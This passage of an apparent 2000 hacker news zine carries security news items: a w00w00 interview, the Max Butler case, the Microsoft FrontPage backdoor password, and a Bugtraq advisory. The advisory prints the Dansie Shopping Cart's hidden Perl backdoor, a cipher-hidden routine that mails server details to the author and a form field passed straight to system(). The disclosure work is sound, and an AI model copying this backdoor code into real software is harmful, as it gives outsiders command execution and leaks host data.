out: What do you think is a fair and efficient way of disarming online
assailants to protect your net?
Be creative, let loose; write laws or design technology. And send me your
ideas. Maybe together we can get something done.
@HWA
51.0 [HNN] More EZines Released
~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by dave920
The second issue of HYPE has been released by Black Market Enterprises
featuring w00w00.org. HWA Hax0r News is up to issue number 52.
BME
HWA Hax0r News
http://www.b-m-e.com/features.hype.w00w00.html
http://www.csoft.net/~hwa/HWA-hn52.txt
@HWA
51.1 [IND] HYPE - w00w00 zine
~~~~~~~~~~~~~~~~~~~~~~~~
w00w00
by dave920
page 1 of 2
So I decided it was time to release HYPE : Issue 2. I sent notice to BME
Online's mailing list that I was looking for another candidate to honor
for their contributions, and sure enough I was contacted by an online
friend (that I've actually met in person as well): xm of geekmafia. He
suggested that I take a gander at w00w00.org, a web address that I had not
even heard of before. Since I didn't even recognize it, I decided that I
would follow his suggestion and see what w00w00 was all about.
I was welcomely surprised. I learned that this organization was one of the
largest of its type (which made me feel a bit inferior for not knowing
about them before this). w00w00 is a compliation of many things, mainly
focused on being a computer security forum, "where people could share
technical information and become involved with some of the top people in
the industry." I was immediately interested.
w00w00 is a very relaxed organization and always expanding. It grew
because there was nothing like it that preceded its existance. In the
words of shok, which I agree with tremendously, "w00w00 is a freedom and
not a restriction."
I contacted shok with my request to have w00w00 be the cover for this
issue of HYPE, and he agreed. The following is the interview that took
place.
w00w00 by dave920
page 2 of 2
dave920: What caused w00w00 to arise as an organization?
w00w00: Well, it was not intentionally created. However, the reason that
it succeeded, was the lack of technical security forums, where people
could share technical information and become involved with some of the top
people in the industry. w00w00 is serving as something of a Studio 54,
where acceptance into the group is based on technical knowledge and not
reputation. There are limitations to other forums such as Phrack, L0pht,
and BugTraq. Phrack is a zine, not a forum. L0pht serves a similar purpose
but has been "closed" to all but a small few. BugTraq is a moderated and
fairly uninteractive email forum. w00w00 is the only one offering
technical information on such a wide scale. All members have a very
different background (different areas of knowledge, different countries,
different languages, etc.).
What was the original focus of w00w00, and how has that changed since its
foundation?
At first we tried to keep things very technical. Over time, it became
relaxed and people published work when they felt like it. The group grew
tremendously as a result of it. w00w00 is a loose association, in that
people can continue to work where they do or affiliate with other groups.
w00w00 is a freedom and not a restriction.
How do you feel that your organization has benefitted the Internet
community? In the same regards, how has w00w00 benefitted from it?
We've offered a forum unparallel to any other for the security community.
We've allowed all kinds of people to get together for a common cause (very
similar to a security conference, but online and available 365 days a
year). Without the Internet, w00w00 wouldn't be possible, as we're
entirely Internet-based.
What specific steps have you taken to further the advancement of w00w00?
We intentionally went for diversity, so that each member could grow from
the others. We've always allowed bright people to get involved, and we've
had key involvements with other groups and companies to increase the
commonwealth of the group and share resources.
How has your understanding of the computer underground changed through the
development of w00w00?
Hmm, interesting question. I would say that it allows us to see the
computer security community from both a corporate (many members work for
large security firms) and a security group view, that large corporations
don't have access to. It's allowed us to interact with both sides. As far
as how its changed our understanding, I can't say it has. What I would say
is that it brought the different understandings of different members and
merged them into a common one.
What would you say is the most significant accomplishment that w00w00 has
made?
Growing into not only the world's largest non-profit security
organization, but by far the most diverse in geographic distribution,
ethnic distribution, and technical distribution.
What do you plan for the future of your organization?
Continue to share information, continue to publish or work, and continue
to grow, grow, grow.
@HWA
52.0 [HNN] Max Vision Goes to Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by lseek99
After being hit with a fifteen count indictment last month Max Vision
(Max Butler) returned to court to hear the judge set the timetable for
the trail. Max vision has been charged with interception of
communications, computer intrusion and possession of stolen passwords
in connection with cyber intrusions of Department of Defense computer
systems in the Spring of 1998. Max had created the open source catalog
of IDS signatures known as arachNIDS as well as maintained
whitehats.com.
Security Focus
http://www.securityfocus.com/news/18
"White Hat" Hacker in Court Open source hacker "Max Vision" aided the FBI
while allegedly cracking the Pentagon. By Kevin Poulsen April 13, 2000
12:26 AM PT
A 27-year-old computer security expert and former FBI source returned to
federal court in San Jose, California Wednesday, where he stands accused
of penetrating a string of defense department and civilian computers.
Max Butler, known as "Max Vision" to friends and associates, was slammed
with a fifteen count indictment last month charging him with interception
of communications, computer intrusion and possession of stolen passwords
in connection with an alleged hacking spree in the Spring of 1998. At
Wednesday's appearance, Judge James Ware set a new date of May 8th for
laying down the timetable of deadlines and court appearances that lead to
trial.
Butler's indictment sent shockwaves through the close-knit community of
computer security experts who specialize in the arcane science of
intrusion detection - the careful analysis of Internet traffic for
"signatures" indicative of an attack. Butler is noted for creating and
maintaining arachNIDS, an open source catalog of attack signatures that
could be thought of as a clearinghouse of clues for Internet cybersleuths,
and is part of an overall public resource that Butler created at
WhiteHats.com.
In the parlance of hackers, "white hats" are ethical and law abiding --
distinguishable from "black hats" who crack computers without permission,
and "gray hats" who fall somewhere in between.
Martin Roesch, Director of Forensic Systems at network security startup
Hiverworld, says that until last month, there was no doubt what color
Butler's "hat" was. "He donated an immense amount of time to open source
security, and he did a hell of a job." says Roesch. "Everyone's using
arachNIDS." 'Butler has provided useful and timely information on computer
crimes in the past' -- FBI affidavit Roesch recruited Butler to join
Hiverworld as Vulnerability Engineer, luring him away from the consulting
work and penetration testing he performed as Max Vision Network Security.
According to Hiverworld, Butler passed a background check, and was to
start work on March 21st. He didn't make it.
"The day he was supposed to start he said he was unable to come in... and
that he would catch up with me in a day or two," recalls Hiverworld CTO
David Cruickshank. "That night, I had fallen asleep with the TV on, and I
woke up when I heard his name on the news."
Known Vulnerability Butler self-surrendered to authorities on March
21st, the day he was to begin his new job. He's charged with cracking
systems at McChord Air Force Base, NASA's Marshall Space Flight Center,
the Argonne and Brookhaven National Labs, IDSoftware, and an unspecified
Defense Department system. Another count alleges he unlawfully possessed
477 customer passwords from Aimnet, an ISP.
He plead not-guilty, and was released on March 24th on $100,000 in
signature and property bonds posted by friends in the open source
community, a dozen of whom reportedly flocked to the courtroom in support
of Butler.
According to an FBI affidavit dated July 2nd, 1998, executed by agent
Peter Trahon of the Bureau's San Francisco Computer Crime Squad, the
investigation that led to Butler began in May of that year, when the
Defense Department began suffering a rash of intrusions exploiting a
"recently discovered" vulnerability in a common piece of software called
BIND.
The devastating security hole formally known as the "iquery BIND Buffer
Overflow vulnerability" was publicly announced by Carnegie Mellon's
Computer Emergency Response Team (CERT) on April 8th, 1998, by which time
a new version of BIND without the bug was available. But a month later,
according to the affidavit, hackers were still using it to crack Air Force
systems, nuclear laboratories, the U.S. Departments of Commerce,
Transportation and the Interior, as well as the National Institute of
Health.
According to the statement, on May 21st, 1998 an Air Force investigator
tracked an intruder from McChord Air Force Base back to a computer at Los
Angeles Community College, which proved to be a staging ground for BIND
buffer overflow attacks on military sites all around the country.
Connection logs obtained from the college under a court order lead to a
particular Internet address at an ISP, where records obtained under a
second court order completed the trace to Max Butler's home telephone
number.
The telephone number was familiar to the FBI. "Max Butler is well known to
the [agents] of the Computer Crime Squad," the 1998 affidavit reads.
"Butler has been a confidential source... for the FBI for approximately 2
years. He has provided useful and timely information on computer crimes in
the past."
The affidavit notes that their source "has the ability to develop
techniques for, and commit, a sophisticated computer intrusion such as the
ones described herein."
"Hacker Witch-Hunt" The FBI searched Butler's home on July 2nd,
1998. But according to his lawyer, the raid didn't stop the Computer Crime
Squad from returning to Butler for more help.
Defense attorney Jennifer Granick, says her client's cooperation with the
FBI never involved informing on other people. "They used him for
technological help, and then they pressured him to do more than that, and
to do things he didn't want to do," says Granick. "They continued to seek
his assistance even after he became a suspect in this case." [Granick has
contributed to SecurityFocus.com.]
"The government then turns around in court and says he's dangerous and
he's a flight risk, even though they had continued to want to work with
him," says Granick, who declined to comment on other details of the case.
Assistant U.S. Attorney Ross Nadel -- Butler's prosecutor and the head of
Silicon Valley's "Computer Hacking and Intellectual Property" (CHIP) unit
-- didn't return phone calls Wednesday.
Butler is under advice from Granick not to speak to the press, and he
didn't answer an email inquiry. But in an April 3rd message to an
intrusion detection forum, Butler commented on what he termed the "frenzy
of the hacker witch-hunt."
"I am innocent until proven guilty and would appreciate the recognition of
this by our community," writes Butler, who also vows to continue his work
on open source security, though at a reduced capacity. "Due to my unusual
circumstances, the focus of my activities will shift to more professional
work and less pure research... I'll do what I can as the situation
allows."
Butler also railed against Hiverworld, which withdrew its employment offer
after learning of his indictment. "[T]he corporation expressed cowardice
that is deplorable. I can't tell you how disappointed I was to feel the
complete lack of support from the Hive," wrote Butler.
Hiverworld's Cruickshank says the company had no choice. "We're a security
start up that does intrusion detection and vulnerability scanning, so
having a person on staff who is under suspicion for major hacking
incidents is probably not the best idea in the world," says Cruickshank.
"As a security company," Cruickshank adds, "it's really important for us
to have white hats on board."
@HWA
53.0 [HNN] Mitnick On the Corporate Conference Circuit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Weld Pond
Kevin Mitnick is making the rounds of the corporate conference
circuit. In Salt Lake City next week he will lead a three-person panel
discussion on cyber security issues. He will join Rob Clyde, vice
president of security management at AXENT Technologies, Inc., and
Kelly White, senior consultant with Context Integration in a
discussion of cyber security issues.
PR Newswire - via Excite
http://news.excite.com/news/pr/000412/ut-uita-nettrends
Kevin Mitnick, Reformed Hacker, to Lead Cyber Security Panel at UITA's
NetTrends 2000
Information Security Experts to Give Utah Businesses a Wake-up Call
Updated 3:25 PM ET April 12, 2000 MIDVALE, Utah, April 12 /PRNewswire/ --
One of the most visible computer hackers in the world will be in Salt Lake
City next week to lead a three-person panel discussion on cyber security
issues. Kevin Mitnick has spent more than six of the last 20 years in jail
or prison for various technology related crimes. He was most recently
released from a medium-security federal prison in Lompoc, California after
being incarcerated for more than four years.
Next Wednesday Mitnick will join Rob Clyde, vice president of security
management at AXENT Technologies, Inc., and Kelly White, senior consultant
with Context Integration, in what is expected to be a free-wheeling panel
discussion on cyber security issues facing businesses and governments in
Utah and around the world.
The 75-minute cyber security panel discussion will be held from 1:00 p.m.
to 2:15 p.m. on Wednesday, April 19 at the Salt Palace Convention Center
in Salt Lake City. The panel discussion is part of a two-day event, April
19 and 20, produced by the Utah Information Technologies Association
called NetTrends 2000: The Digital Revolution.
"The Cyber Security panel will provide invaluable security information to
business leaders," said Richard Nelson, president and chief executive
officer of UITA. "Our panel of experts has nearly 50 years of combined
experience in information security. But what makes this panel truly unique
is the diversity of experience our panelists have. Rob has spent his
career creating computer security systems, Kelly has studied and tested
security systems and Kevin has built his expertise in circumventing these
systems. Together the three will discuss the real security issues facing
businesses today and the best solutions to effectively protect systems
from intrusion."
Mitnick is recognized by many as one of the most visible hackers in
history, including breaking into computer systems at some of the world's
largest corporations. As a reformed hacker, Mitnick's expert commentary
has been broadcast on CBS's 60 Minutes, CNN, Fox and CourtTV. In March
2000, he testified before the United States Senate in committee hearings
to explore ways to make computer systems safer from intruders.
As a founder of AXENT Technologies, Robert Clyde was a primary developer
of AXENT's original security management products and launched its security
consulting services. (AXENT is a provider of enterprise security solutions
for distributed computer environments.) Clyde has more than 20 years of
experience in security product development, management and consulting. He
has provided security consulting to Fortune 1000 companies and financial
institutions, advising CIOs and IT managers on how to solve security
problems at an enterprise level. Clyde is also a sought-after speaker at
security-related conferences.
Kelly White is a senior consultant with Context Integration, a provider of
business-to-business e-commerce solutions. Prior to joining Context
Integration, White was an Internet security specialist with Ernst & Young
LLP. As a security consultant, White conducted Internet attack and
penetration studies and designed Internet security architectures for
Fortune 1000 companies.
NetTrends 2000, Utah's premier IT conference, is focused on providing Utah
IT professionals with insights regarding today's best e-Business models,
future technologies and emerging trends. NetTrends 2000 will be held April
19-20 at the Salt Palace Convention Center in Salt Lake City, Utah.
NetTrends 2000 is a day and a half event running from 8:00 am to 4:00 p.m.
on April 19 and from 8:00 a.m. to 11:45 a.m. on April 20. The cost is $195
for UITA members and $295 for non-members. To register online, visit
www.uita.org or call Jennifer at 801-568-3500.
Utah Information Technologies Association is a non-profit organization
comprised of Utah information technology professionals dedicated to
providing services and events that enhance the growth of Utah's IT
community, consisting of over 2500 IT enterprises, through networking,
capital formation, skilled workforce development, positive media
recognition, public policy advocacy and marketing opportunities. For more
information about UITA or NetTrends 2000 visit www.uita.org or call
801-568-3500.
Contact: Richard Nelson of UITA, 801-568-3500, rnelson@uita.org; or David
Politis, dpolitis@politis.com, or Stephanie Dullum, sdullum@politis.com,
both of Politis Communications, 801-523-3730, for Utah Information
Technologies Association
@HWA
54.0 [HNN] AOL Liable for Music Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by root66
A German court has ruled that AOL Germany is liable for pirate music
held on its servers. The ruling stems from a case filed by Hit box in
1998. AOL says it will appeal and that there is no technical way that
it can monitor all its content all the time.
USA Today
http://www.usatoday.com/life/cyber/tech/review/crh053.htm
04/12/00- Updated 11:45 AM ET
German court: AOL liable for music piracy MUNICH, Germany (AP) - In a
ruling that could give the music industry a weapon against Internet
piracy, a court said Wednesday that America Online is responsible when
users swap bootleg music files on its service.
The case before a Bavarian state court in Munich originated with Hit Box
Software, a German company that sued AOL Germany for copyright violation
in 1998 after discovering that its digital music files were being
exchanged on the online service. An attorney for Hit Box, Stefan Ventroni,
hailed the ruling as an important step toward giving musicians better
protection against unauthorized use of their performances on the Internet.
''With this verdict, they can demand that such Internet pages be
blocked,'' he said.
AOL Germany said it would appeal. It argued that it lacks technical means
to monitor the service's huge data flow and that it had closed down the
forum where music was illegally swapped after learning of it.
''Total control of all pages on our servers is technically almost
impossible,'' said Alexander Adler, a spokesman for AOL Germany. ''Also,
that would amount to censorship.''
At issue were three instrumental versions of pop hits, including Get Down
by the Backstreet Boys, intended mainly for use as karaoke soundtracks.
Hit Box said each track, which normally costs up to $15 on a CD, was
downloaded for free more than 1,000 times via AOL.
Hit Box demanded about $50,000 in damages, but the court put off a ruling
on the size of the award.
Gema, Germany's main music licensing group, said the verdict was a signal
that Internet services need to introduce technologies to protect
copyrights online.
''The Internet is not a lawless space,'' spokesman Hans-Herwig Geyer said.
''Right now, the rights of creative artists are being trampled on in the
Internet.''
--------------------------------------------------------------------------
------ Copyright 2000 Associated Press. All rights reserved. This material
may not be published, broadcast, rewritten or redistributed.
@HWA
55.0 [HNN] Canadian ISP Reveals Credit Card Numbers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Chris
Look Communications (formerly Internet Direct) allowed a file
containing personal information on over 1,000 people, including credit
card numbers to be accessible to anyone via the web. The file was in
place for over five days after the company was first notified before
it was removed. Toronto Star
National Post
http://www.thestar.com/thestar/back_issues/ED20000411/news/20000411NEW03_CI-CREDIT.html
http://www.nationalpost.com/financialpost.asp?f
Star:
Credit card files turn up on the Net Security breach at service provider
By Kerry Gillespie Toronto Star Staff Reporter More than 1,000
confidential records - including credit card numbers - were accessible on
the Internet for at least five days because of a security breach at one of
Canada's largest service providers.
A man surfing the Internet stumbled on the file and notified Look
Communications, formerly Internet Direct, of their problem on April 5.
The file disappeared briefly, but returned and was still there last night
when The Star called.
Nearly three hours later, the file was gone.
``We're shutting the whole thing down now and, frankly, I'll shut down the
whole system if I have to,'' Gary Kawaguchi, a shaken senior
vice-president said last night.
He had no idea how the security breach occurred or why the company hadn't
managed to deal with it when first notified.
``This whole thing is going to prompt us to have a third party security
scan on everything we do,'' Kawaguchi said.
Look Communications has some 175,000 customers across the country. But
most of the addresses on the file were from Ontario.
The man who found the file and doesn't want his name used got in touch
with K. K. Campbell, a Star columnist who writes about the Internet for
the Fast Forward section, after the company failed to fix the problem.
``I've been writing about this for close to 10 years and I've never seen
one so close to home,'' Campbell said. It was Toronto Councillor Jack
Layton's name that first jumped out at him.
``That's a bit scary to think it's that easily accessible,'' Layton said,
when notified that an older credit card of his was on the list. ``I wonder
how many thousands of dollars in fraudulent transactions have gone on. The
company certainly owes people an explanation.''
Kawaguchi said they notified the credit card companies last night.
The list contained names of people who subscribed to Ipass, a global
roaming service for the Internet that allows users to pay local rates
instead of long distance charges.
Jacqueline Miller, a graduate student who does a lot of work abroad,
applied for the service to save money. While upset that her American
Express card number was out in the open, Miller wasn't surprised. When she
originally tried to sign up for the Ipass service over the Internet, the
screen told her it wasn't a secure Web site.
``So I did it all verbally by the phone, because I refused to use their
Web site,'' she said. ``I told them at the time, but they insisted `No, it
is secure.' ''
Chris Davis, an Internet security specialist, said he was shocked.
``Any of those people on that list could sue that company,'' said Davis,
CEO of HeXedit Network Security Inc., from his Ottawa home last night.
Credit card information is supposed to be sent from the user to the
company on a secure encrypted link, he said.
Once it reaches the company it is un-encrypted for use but should then be
destroyed.
@HWA
56.0 [HNN] Vatis Concerned About Spoofing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by acopalyse
Micheal Vatis, director of the FBI's National Infrastructure
Protection Center has said that spoofing makes it very difficult for
the law enforcement to determine where an attack originates from.
Vatis proposed two possible solutions, enable civilians not bound by
the fourth amendment to conduct investigations or to somehow defeat
spoofing with better technology.
Computer Currents
http://www.currents.net/newstoday/00/04/13/news4.html
@HWA
57.0 [HNN] L0pht Releases CRYPTOCard Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Silicosis
L0pht Labs at @Stake has released an advisory regarding the Palm Pilot
implementation of CRYPTOCard, a software challenge/response user
authentication system. L0pht has found that the users PIN can be
determined form the .PDB file stored on the Pilot. CRYPTOCard
Corporation has already provided a list of recommendations.
L0pht Labs at @Stake
Crypto Card Corporation
http://www.l0pht.com
http://www.cryptocard.com
@HWA
58.0 [HNN] Phone Company's Announce Security Initiative
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by ts
Mobil phone companies Ericson, Nokia, and Motorola have announced a
new initiative to secure online e-commerce via mobile phones by
creating an open global industry framework for more secure
transactions. The companies said that they would issue technical
bulletins about the initiative by the end of May.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2531636,00.html?chkpt
Cell phone giants in Net security pact
The world's top three mobile phone manufacturers teamed up to develop an
open, global industry framework for safer and simpler business over cell
phones.
By Kirstin Ridley, Reuters April 12, 2000 5:24 AM PT
LONDON -- The world's top three mobile phone manufacturers teamed up on
Tuesday in an attempt to secure the growth of e-commerce by developing an
open, global industry framework for safer and simpler business over cell
phones.
Dismissing concerns that current Internet-enabled phones are unsafe,
Sweden's Ericsson (Nasdaq: ERICY), Motorola (NYSE: MOT) of the United
States and Finland's Nokia (NYSE: NOK) called on industry peers to jump
aboard their initiative and ensure that customers can use mobile phones
for trusted, electronic transactions.
"A mobile device will be the platform to bridge the virtual and physical
worlds of e-business," said Matti Alahuhta, president of Nokia's mobile
phones division.
"Integrating security and transaction applications on a common core
standard and platform will create a global mass market for mobile
e-business," he added.
Encoding data sent over airwaves, establishing its authenticity, ensuring
confidentiality and preventing its unauthorized modification and use is
seen as vital to unleash the potential for a booming virtual business
world.
And the companies said the initiative is the key to ensure that growth
projections are met. Ericsson forecasts there will be around 1 billion
mobile telephone users and some 600 million mobile Internet subscribers
worldwide by 2004.
WAP phones need WIM Alahuhta conceded that WAP (Wireless Application
Protocol) mobile phones, which allow Internet access, carry no guarantee
that transactions are being made by the phone's owner.
The answer lies partially in WAP security functions such as WTLS (Wireless
Transport Layer Security) and WIM (Wireless Identification Module), which
will act as a user ID for access to the Internet and offer the
authentication for e-business that cell phone Internet transactions
currently lack.
The three industry heavyweights said their initiative went further than
that of Radicchio, a 36-member consortium of technology and telecom firms
across Europe, the United States and Japan that has also called for more
secure mobile e-commerce.
Radicchio backs Finnish Sonera's technology solution, a so-called public
key infrastructure (PKI)-based framework, which could be used as a global
standard to ensure that any data sent is scrambled into a tough code to
make it hacker-proof.
Ericsson, Motorola and Nokia also hope to help set up an industry standard
for a digital signature that will provide the authentication -- ensuring
the identity of users -- that is necessary for secure mobile e-commerce.
"The mobile device can be a tool for a variety of services, such as
banking and trading services, credit card and payment services,
loyalty/bonus services, and ID-card services," the companies said.
"The aim is to offer solutions where security and payment services will be
integrated as a standard into hundreds of millions of mobile devices in
years to come."
The three companies said they would issue technical and other details
about the initiative by the end of May on their Web sites and hope to
formulate an open framework before the summer.
@HWA
59.0 [HNN] Microsoft Admits to Backdoor in Server Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by McIntyre
Microsoft has admitted that a secret password exists in its Internet
Server software. The backdoor, brought to light by Rain Forest Puppy,
could allow an intruder complete remote access to the system.
Microsoft recommends that the file dvwssr.dll be deleted from Internet
Server installations with Front Page extensions installed. The
password has been present in the code for at least three years and
Microsoft has said that it is conducting an internal investigation.
Wall Street Journal - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html
MS admits planting secret password
Microsoft engineers placed a password in server software that could be
used to gain illicit access to hundreds of thousands of Internet sites
worldwide.
By Ted Bridis, WSJ Interactive Edition UPDATED April 14, 2000 12:50 PM PT
Microsoft Corp. acknowledged Thursday that its engineers included in some
of its Internet software a secret password -- a phrase deriding their
rivals at Netscape as "weenies" -- that could be used to gain illicit
access to hundreds of thousands of Internet sites worldwide. The
manager of Microsoft's security-response center, Steve Lipner,
acknowledged the online-security risk in an interview Thursday and
described such a backdoor password as "absolutely against our policy" and
a firing offense for the as-yet-unidentified employees.
The company planned to warn customers as soon as possible with an e-mail
bulletin and an advisory published on its corporate Web site. Microsoft
(Nasdaq: MSFT) urged customers to delete the computer file--called
"dvwssr.dll"--containing the offending code. The file is installed on the
company's Internet-server software with Frontpage 98 extensions.
While there are no reports that the alleged security flaw has been
exploited, the affected software is believed to be used by many Web sites.
By using the so-called back door, a hacker may be able to gain access to
key Web-site management files, which could in turn provide a road map to
such things as customer credit-card numbers, said security experts who
discovered the password.
Two security experts discovered the rogue computer code -- part of which
was the denigrating comment "Netscape engineers are weenies!" -- buried
within the 3-year-old piece of software. It was apparently written by a
Microsoft employee near the peak of the hard-fought wars between Netscape
Communications Corp. and Microsoft over their versions of Internet-browser
software. Netscape later was acquired by America Online Inc.
One of the experts who helped identify the file is a professional security
consultant known widely among the Internet underground as "Rain Forest
Puppy." Despite his unusual moniker, he is highly regarded by experts and
helped publicize a serious flaw in Microsoft's Internet-server software
last summer that put hundreds of high-profile Web sites at risk of
intrusion.
Almost every Web-hosting provider Russ Cooper, who runs the popular
NT Bugtraq discussion forum on the Internet, estimated that the problem
threatened "almost every Web-hosting provider."
"It's a serious flaw," Cooper said. "Chances are, you're going to find
some major sites that still have it enabled." Lipner of Microsoft said the
company will warn the nation's largest Web-site providers directly.
In an e-mail to Microsoft earlier Thursday, Rain Forest Puppy complained
that the affected code threatened to "improve a hacker's experience."
Experts said the risk was greatest at commercial Internet-hosting
providers, which maintain hundreds or thousands of separate Web sites for
different organizations.
Lipner said the problem doesn't affect Internet servers running Windows
2000 or the latest version of its server extensions included in Frontpage
2000.
The digital gaffe initially was discovered by a Europe-based employee of
ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells
e-commerce technology. The company declined to comment because of its
coming stock sale. The other expert, Rain Forest Puppy, said he was tipped
off to the code by a ClientLogic employee.
When asked about the hidden insult Thursday, Jon Mittelhauser, one of
Netscape's original engineers, called it "classic engineer rivalry."
@HWA
60.0 [HNN] Backdoor Found in E-Commerce Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by brian
Currently being used at over 200 e-commerce sites, Dansie Shopping
Cart, contains code that allows the author to remotely enter the
system and run code on the server. The back door was discovered by
Blarg Online Services which allows someone to remotely enter the
server and issue commands to run CGI scripts. There has been no
response from Dansie in regard to the allegations.
Internet News
http://www.internetnews.com/ec-news/article/0,2171,4_340591,00.html
Shopping Cart Program Leaves Back Door Open By Brian McWilliams
The developer of a highly-rated ecommerce shopping cart is accused of
building a software backdoor into the program that could give him or
hackers complete control of the server on which it's installed.
The Dansie Shopping Cart, which is currently in use at more than 200
e-commerce sites and is recommended by several Web hosting firms, contains
code that enables the author, Craig Dansie of Moreno Valley, Calif., to
potentially run any command on the Web server.
"He doesn't have the right to execute commands on our server without our
authorization. That is technically a hack, and he put it into his code
deliberately. It's unconscionable," said Joe Harris, a technical support
representative at Blarg Online Services in Seattle. Harris discovered the
hidden capability while helping a client install the Dansie Shopping Cart,
a CGI script written in the Perl language, and publici zed his findings
earlier this week on the Bugtraq security mailing list.
According to Harris, Dansie built a subroutine into the cart which enables
him to use a nine-character form element or password to remotely execute
commands on the server using the broad security privileges usually
assigned to CGI scripts. But because the password is the same for every
installation of the cart, and because the script must be installed with
world-readable permission, anybody who has access to a server on which the
cart is installed could retrieve the source code and the form element and
use it to control other servers, according to Harris.
"It takes little imagination to dream up the potential havoc and privacy
violations this level of access could result in -- from stealing private
customer records to a full-blown crack of an e-commerce server," said
Harris.
Dansie did not respond to repeated requests for comment. The telephone
number listed in the domain record for dansie.net was disconnected
sometime Thursday. And a list of several hundred customers was removed
from the site Wednesday evening.
Licenses for the Dansie cart start at $150 and range up to $650 for the
mall version which can handle an unlimited number of merchants on the same
server.
According to Kasey Johns, Webmaster for Lonestar Badge and Sign of
Martindale, Texas, the backdoor in the Dansie cart appears to be a means
of protecting against unauthorized installations and of ensuring
compliance with the software's licensing terms, which specifically
prohibit modifying the source code. Johns said he learned of the backdoor
in late March while trying to debug an installation problem.
"I tried to make some changes to it, and basically he deleted the script
right off of my server. That just doesn't seem right," said Johns.
In an e-mail to Johns Wednesday, Dansie accused him of piracy and asserted
that "The software has a copyright protection feature that poses NO
security risk to your Web site or your Web server."
But Johns said Dansie's anti-piracy efforts are over zealous. "I want the
right to look at the code, make modifications, and not be locked into
whatever ghosts the author has hiding in there," said Johns.
According to Allan Knight, Webmaster for ValueWebHosting in Williamsville,
New York, which has over 60 hosting clients using the cart, Dansie
recently denied that the program passed information back to him. Knight,
who has been using the cart for three years, said Thursday he was not
aware that the script gave Dansie or others the ability to execute
arbitrary commands. But Knight said he had no plans to stop using the
software.
"I have never had any reason to shed any distrust on Craig whatsoever,"
said Knight.
While Dansie could issue a patch to customers to disable the backdoor,
Harris said prudent users will uninstall the software and find a new
shopping cart provider.
"His credibility is destroyed. Would you ever again trust anybody who did
this? Imagine if it had been Microsoft," Harris said.
http://www.dansie.net/cart.html
http://www.blarg.net/
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-04-08&msg=Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net
To: BugTraq
Subject: Back Door in Commercial Shopping Cart
Date: Tue Apr 11 2000 02:24:06
Author: Joe
Message-ID: <Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net>
Trojanized Commercial Shopping Cart
===============================================================
Dansie Shopping Cart
Version : 3.04 (presumably earlier versions as well)
Author : Craig Dansie
URL : http://www.dansie.net/
Language : Perl (both NT and Unix platforms are vulnerable)
License : Commercial, starting at $150.00
Copyright Dec 10, 1997-2000, Dansie Website Design
Synopsis : This program -deliberately- allows arbitrary commands to be
executed on the victim server.
One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup. While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.
The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@dansie.net'. This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':
------
sub there2
{
$_ = "$_[0]";
tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
tr/_/-/;
tr/\@/\./;
return $_;
}
-------
The call that creates this email address and sends the mail is the
function 'there3'.
-------
sub there3
{
if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
{
$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
pop(@there2);
pop(@there2);
$c = &there2("@there2");
open (TECH, "|$mailprog $a");
print TECH "To: $a\n";
print TECH "From: $a\n";
print TECH "Subject: $b\n\n";
print TECH "$path3\n";
print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
print TECH "$c\n";
print TECH "$e $there\n" if ($e);
close (TECH);
}
}
-------
The ciphered strings, when passed through 'there2', result in:
8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@dansie.net
$b == Subject: tech-support
This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.
While going through the rest of the code we discovered a much more
interesting item.
(We've masked out the actual trigger element with question marks)
----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
if ( $ENV{'OS'} )
{
system("$FORM{'?????????'}");
}
else
{
open(ELIF,"|$FORM{'?????????'}");
}
exit;
}
---------
The form element '?????????', which was originally a pseudo-random appearing
nine digit string of letters and numbers, allows an intruder to execute any
command on the server with the same privileges as the CGI process itself.
Although this is a full disclosure list, the trigger element is obscured to
prevent the script kiddies from running away with this back door. If you
own the cart, then you have access to the source code and can discover the
element in question easily enough on your own.
Further searches through the code reveal that this form element is immune
to data validation - it gets passed into this code fragment unchallenged.
The '$d' variable of the condition which permits the back door to function
is set elsewhere in the program to contain the string 'dansie'. (Again,
using the ciphertext algorithm) This indicates that the form element won't
work on Dansie's own host, but will work on anyone elses. There are
additional problems with the 'there' function but we'll leave them as
exercises for the reader to decipher.
Dansie.net, armed with the server name and URL to the CGI executable
provided by the cloaked email routine, would be able to run commands on any
web server on the Internet that has the Dansie Shopping Cart installed. It
takes little imagination to dream up the potential havoc and privacy
